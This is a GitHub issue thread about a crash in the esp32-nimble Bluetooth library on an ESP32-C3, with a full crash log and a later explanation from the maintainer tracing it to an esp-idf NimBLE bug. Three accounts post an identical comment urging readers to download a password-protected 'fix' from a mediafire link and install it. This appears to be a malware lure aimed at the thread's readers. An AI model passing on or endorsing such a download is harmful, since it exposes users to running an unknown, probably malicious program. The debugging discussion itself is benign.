taks/esp32-nimble #139: unhandled event: 29

reformc, 2024-08-27:
esp32c3，
When a device is connected, the following error message is displayed:

I (24627) NimBLE: GAP procedure initiated: connect; 
I (24627) NimBLE: peer_addr_type=1 peer_addr=
I (24627) NimBLE: cc:28:d6:f8:80:da
I (24627) NimBLE:  scan_itvl=16 scan_window=16 itvl_min=24 itvl_max=40 latency=0 supervision_timeout=256 min_ce_len=0 max_ce_len=0 own_addr_type=0
I (24637) NimBLE:

I (27647) NimBLE: GATT procedure initiated: exchange mtu

I (27977) NimBLE: Reattempt connection; reason = 0x3e, status = 0,reattempt count = 0 
W (27987) esp32_nimble::client::ble_client: unhandled event: 29
I (27987) NimBLE: GAP procedure initiated: connect; 
I (27987) NimBLE: peer_addr_type=1 peer_addr=
I (27997) NimBLE: cc:28:d6:f8:80:da
I (27997) NimBLE:  scan_itvl=16 scan_window=16 itvl_min=24 itvl_max=40 latency=0 supervision_timeout=256 min_ce_len=0 max_ce_len=0 own_addr_type=0
I (28017) NimBLE:

Guru Meditation Error: Core  0 panic'ed (Store access fault). Exception was unhandled.

Core  0 register dump:
MEPC    : 0x4200453a  RA      : 0x42049626  SP      : 0x3fcabee0  GP      : 0x3fc91200
0x4200453a - esp32_nimble::client::ble_client::BLEClient::handle_gap_event
    at ??:??
0x42049626 - ble_gap_rx_conn_complete
    at ??:??
0x3fc91200 - __global_pointer$
    at ??:??
TP      : 0x3fc8a130  T0      : 0x420495fe  T1      : 0x0000000f  T2      : 0x00002710
0x420495fe - ble_gap_rx_conn_complete
    at ??:??
S0/FP   : 0x3fcabf9c  S1      : 0x3fcabff0  A0      : 0x00000001  A1      : 0x00000000
A2      : 0x0000000f  A3      : 0x00000015  A4      : 0x4200405a  A5      : 0x00000000
0x4200405a - $x
    at ??:??
A6      : 0x00000001  A7      : 0xfff00000  S2      : 0x00000001  S3      : 0x3fcabfb4
S4      : 0x00000000  S5      : 0x00000000  S6      : 0x00000000  S7      : 0x00000000
S8      : 0x00000000  S9      : 0x00000000  S10     : 0x00000000  S11     : 0x00000000
T3      : 0x3fc94000  T4      : 0x00000001  T5      : 0x3fc94000  T6      : 0x00000001
0x3fc94000 - init
    at ??:??
0x3fc94000 - init
    at ??:??
MSTATUS : 0x00001881  MTVEC   : 0x40380001  MCAUSE  : 0x00000007  MTVAL   : 0x00000064
0x40380001 - _vector_table
    at ??:??
MHARTID : 0x00000000

Stack memory:
3fcabee0: 0x00000000 0x00000000 0x3fcab04c 0x40389862 0x00000001 0x00000000 0x00000000 0x00000000
0x40389862 - xQueueGenericSend
    at ??:??
3fcabf00: 0x00000001 0x00000000 0x3fcab04c 0x40389f42 0x00000000 0x00000000 0x00000000 0x00000001
0x40389f42 - xQueueTakeMutexRecursive
    at ??:??
3fcabf20: 0x00000001 0x3fcac0a8 0x3fcab04c 0x403899ec 0x00000000 0x3fcabff0 0x3fc94a90 0x4204f856
0x403899ec - xQueueGiveMutexRecursive
    at ??:??
0x3fc94a90 - ble_freertos_mutex_buf
    at ??:??
0x4204f856 - npl_freertos_mutex_release
    at ??:??
3fcabf40: 0x00000001 0x3fcabff0 0x3fcabf9c 0x42049062 0x00000000 0x3fcabff0 0x3fcabfb4 0x00000001
0x42049062 - ble_gap_call_conn_event_cb
    at ??:??
3fcabf60: 0x00000001 0x3fcabff0 0x3fc951b0 0x42049626 0x00000000 0x00000014 0x3fcac018 0x3fcac009
0x3fc951b0 - pool_cmd
    at ??:??
0x42049626 - ble_gap_rx_conn_complete
    at ??:??
3fcabf80: 0xffffffff 0x3fcaadac 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
3fcabfa0: 0x00000000 0x00000001 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
3fcabfc0: 0x00000000 0x00000000 0x00000000 0x00000000 0x00006d77 0x7fffffff 0x00000000 0x3fc94000
0x3fc94000 - init
    at ??:??
3fcabfe0: 0x3fc94000 0x3fc93f20 0x3fca85de 0x4204560c 0x00010000 0x80da0100 0xcc28d6f8 0x00000028
0x3fc94000 - init
    at ??:??
0x3fc93f20 - ble_hs_ev_stop
    at ??:??
0x4204560c - ble_hs_hci_evt_le_enh_conn_complete
    at ??:??
3fcac000: 0x00000100 0x00000000 0x00000000 0x00000000 0x3fc94000 0x3fca85dc 0x3fca85dc 0x42045748
0x3fc94000 - init
    at ??:??
0x42045748 - ble_hs_hci_evt_process
    at ??:??
3fcac020: 0x3fc94000 0x3fc93f20 0x3fc941d0 0x40382b36 0x00000000 0x00000000 0x00000000 0x00000000
0x3fc94000 - init
    at ??:??
0x3fc93f20 - ble_hs_ev_stop
    at ??:??
0x3fc941d0 - ble_hs_hci_os_event_buf
    at ??:??
0x40382b36 - nimble_port_run
    at ??:??
3fcac040: 0x00000000 0x00000000 0x00000000 0x42001b1a 0x3c090a34 0x00000001 0x00000004 0x00000000
0x42001b1a - esp32_nimble::ble_device::BLEDevice::blecent_host_task
    at ??:??
0x3c090a34 - $d
    at ??:??
3fcac060: 0x00000000 0x00000000 0x3c090950 0x00000018 0x3c090950 0x00000018 0x3c090a3c 0x00000000
0x3c090950 - $d
    at ??:??
0x3c090950 - $d
    at ??:??
0x3c090a3c - $d
    at ??:??
3fcac080: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0xa5a5a5a5 0xa5a5a5a5 0xa5a5a5a5
3fcac0a0: 0xa5a5a5a5 0x00000150 0x3fcabeb0 0x00000000 0x3fc93184 0x3fc93184 0x3fcac0a8 0x3fc9317c
0x3fc93184 - pxReadyTasksLists
    at ??:??
0x3fc93184 - pxReadyTasksLists
    at ??:??
0x3fc9317c - pxReadyTasksLists
    at ??:??
3fcac0c0: 0x00000004 0x3fcaadb4 0x3fcaadb4 0x3fcac0a8 0x00000000 0x00000015 0x3fcab0a4 0x626d696e
3fcac0e0: 0x685f656c 0x0074736f 0x00000000 0x3fcac0a0 0x00000015 0x00000000 0x00000000 0x00000000
3fcac100: 0x00000000 0x3fc9617c 0x3fc961e4 0x3fc9624c 0x00000000 0x00000000 0x00000001 0x00000000
3fcac120: 0x00000000 0x00000000 0x4203b764 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
0x4203b764 - esp_cleanup_r
    at ??:??
3fcac140: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
3fcac160: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
3fcac180: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
3fcac1a0: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
3fcac1c0: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
3fcac1e0: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x0000001c 0x33707365
3fcac200: 0x696e5f32 0x656c626d 0x6c623a3a 0x65645f65 0x65636976 0x3fcac100 0x00000018 0x33707365
3fcac220: 0x696e5f32 0x656c626d 0x6c623a3a 0x65645f65 0x65636976 0x00000020 0x00000000 0x00000000
3fcac240: 0x00000000 0x00000000 0x4204fd30 0x3fc94b1c 0x3fca5a6c 0x3fc93e0c 0x00000054 0x00000000
0x4204fd30 - ble_npl_event_fn_wrapper
    at ??:??
0x3fc94b1c - ble_freertos_co_buf
    at ??:??
0x3fc93e0c - s_timers
    at ??:??
3fcac260: 0x3fcac25c 0x00000000 0x00000000 0x00000000 0x3fcac274 0xffffffff 0x3fcac274 0x3fcac274
3fcac280: 0x00000000 0x3fcac288 0xffffffff 0x3fcac288 0x3fcac288 0x00000001 0x00000001 0x00000000
3fcac2a0: 0xb400ffff 0x00000000 0xd7bcc010 0x3fcac254 0x00000020 0x0f010006 0x68c62220 0xab0cb64c
3fcac2c0: 0xace7677c 0xebb3e855 0x61994087 0xe380dc7b 0x3fcac209 0x0000000c 0x0212004c 0x3fc90200

ELF file SHA256: 000000000

Rebooting...
ESP-ROM:esp32c3-api1-20210207
Build:Feb  7 2021
rst:0xc (RTC_SW_CPU_RST),boot:0xd (SPI_FAST_FLASH_BOOT)
Saved PC:0x4038155c
0x4038155c - esp_restart_noos
    at ??:??
SPIWP:0xee
mode:DIO, clock div:2
load:0x3fcd5820,len:0x1714
load:0x403cc710,len:0x968
load:0x403ce710,len:0x2f9c
entry 0x403cc710

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

reformc, 2024-08-27:
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

It doesn't work

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

taks, 2024-08-28:
Could you upload your code?

reformc, 2024-08-30:
谢谢。但我问了一些朋友和同事，他们都说esp32存在一些蓝牙兼容上的问题，不适合用来做蓝牙开发。

closed 2024-08-30 by reformc

taks, 2024-09-28:
I found the cause of this problem.
It is an issue in nimble of esp-idf.

The 29 event is `BLE_GAP_EVENT_REATTEMPT_COUNT`.
After this event, the connection function is executed again, but the callback argument was incorrect.
(This is fixed in https://github.com/espressif/esp-nimble/commit/626ffa57c011eb7fa9a8d599904bfb7c4cd6238c)
The latest esp-idf v5.2.3 includes this fix.

In older version, disabling the reattempt feature will prevent this from problem.